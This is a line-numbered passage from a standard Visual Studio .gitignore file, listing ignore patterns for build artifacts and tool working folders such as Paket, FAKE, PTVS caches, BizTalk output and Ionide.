290 | **/*.DesktopClient/ModelManifest.xml
291 | **/*.Server/GeneratedArtifacts
292 | **/*.Server/ModelManifest.xml
293 | _Pvt_Extensions
294 |
295 | # Paket dependency manager
296 | .paket/paket.exe
297 | paket-files/
298 |
299 | # FAKE - F# Make
300 | .fake/
301 |
302 | # CodeRush personal settings
303 | .cr/personal
304 |
305 | # Python Tools for Visual Studio (PTVS)
306 | __pycache__/
307 | *.pyc
308 |
309 | # Cake - Uncomment if you are using it
310 | # tools/**
311 | # !tools/packages.config
312 |
313 | # Tabs Studio
314 | *.tss
315 |
316 | # Telerik's JustMock configuration file
317 | *.jmconfig
318 |
319 | # BizTalk build output
320 | *.btp.cs
321 | *.btm.cs
322 | *.odx.cs
323 | *.xsd.cs
324 |
325 | # OpenCover UI analysis results
326 | OpenCover/
327 |
328 | # Azure Stream Analytics local run output
329 | ASALocalRun/
330 |
331 | # MSBuild Binary and Structured Log
332 | *.binlog
333 |
334 | # NVidia Nsight GPU debugger configuration file
335 | *.nvuser
336 |
337 | # MFractors (Xamarin productivity tool) working folder
338 | .mfractor/
339 |
340 | # Local History for Visual Studio
341 | .localhistory/
342 |
343 | # BeatPulse healthcheck temp database
344 | healthchecksdb
345 |
346 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
347 | MigrationBackup/
348 |
349 | # Ionide (cross platform F# VS Code tools) working folder
350 | .ionide/
351 |
--------------------------------------------------------------------------------